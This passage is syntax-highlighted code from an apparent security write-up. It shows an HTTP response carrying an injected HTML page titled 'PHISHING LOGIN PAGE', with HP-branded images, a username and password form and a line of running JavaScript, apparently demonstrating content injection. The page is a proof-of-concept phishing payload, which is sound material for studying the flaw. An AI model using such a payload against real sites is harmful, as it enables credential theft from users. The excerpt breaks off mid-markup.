<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ISO<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8859<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-7\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2565<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-8\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Wed<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Sep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-10\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">DOCTYPE <\/span><span class=\"crayon-e\">HTML <\/span><span class=\"crayon-m\">PUBLIC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-11\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-12\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-13\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">PHISHING <\/span><span class=\"crayon-e\">LOGIN <\/span><span class=\"crayon-v\">PAGE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">meta <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">equiv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/html; charset=US-ASCII&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">link <\/span><span class=\"crayon-v\">rel<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Shortcut Icon&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;\/login\/images\/hp.ico&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-17\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-19\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">onLoginFornLoad<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-20\"><span class=\"crayon-h\">\t\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;txtUsername&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">focus<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-21\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;style <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-k\">=&#8221;text\/css&#8221;&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-24\"><span class=\"crayon-k\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.style1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-25\"><span class=\"crayon-k\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">width<\/span><span class=\"crayon-sy\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">290px<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">.style2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-29\"><span class=\"crayon-k\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">width<\/span><span class=\"crayon-sy\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">285px<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;\/style&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-33\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-35\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">body <\/span><span class=\"crayon-v\">onload<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;onLoginFornLoad()&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-36\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">h2<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">PHISHING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">LOGIN<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PAGE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">h2<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-37\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;I`m also running JS&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-38\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;j_security_check&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;POST&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-39\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-v\">cellpadding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cellspacing<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;100%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;100%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;background-color: #ffffff&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-40\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-41\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">align<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;center&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">valign<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;middle&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-42\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-v\">cellpadding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cellspacing<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;309&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;border: 1px solid #000000; background-position: left top; background-image:url(&#8216;\/login\/images\/hp_logo.png&#8217;); background-repeat: no-repeat; width: 576px; clip: rect(1px, auto, auto, auto);&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-44\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-45\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;style2&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-46\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;style1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-47\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-v\">cellpadding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cellspacing<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-48\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-49\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;60&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;font-family: Arial, Helvetica, sans-serif; color: #000000; font-weight: bold&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">Name<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-52\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;j_username&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;14&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;width: 193px;&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;txtUsername&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-54\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-55\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;3&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-56\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-57\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;font-family: Arial, Helvetica, sans-serif; font-weight: bold&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Password<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-58\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;j_password&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;14&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;width: 191px&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-59\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-60\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;3&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-61\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div 